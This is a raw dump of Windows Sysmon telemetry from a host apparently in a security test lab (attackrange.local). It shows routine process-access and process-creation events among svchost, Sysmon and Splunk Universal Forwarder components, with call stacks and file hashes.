15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7E50-5FA1-8F01-000000008801}2480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E50-5FA1-8F01-000000008801}2480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.436{D28789B6-7E50-5FA1-8F01-000000008801}2480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.028{D28789B6-7E4F-5FA1-8E01-000000008801}28802884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.934{D28789B6-7E51-5FA1-9001-000000008801}39722516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E51-5FA1-9001-000000008801}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7E51-5FA1-9001-000000008801}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.809{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E51-5FA1-9001-000000008801}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:13.810{D28789B6-7E51-5FA1-9001-000000008801}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.700{D28789B6-7E52-5FA1-9101-000000008801}20121348C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:14.575{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E52-5FA1-9101-000000008801}2012C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 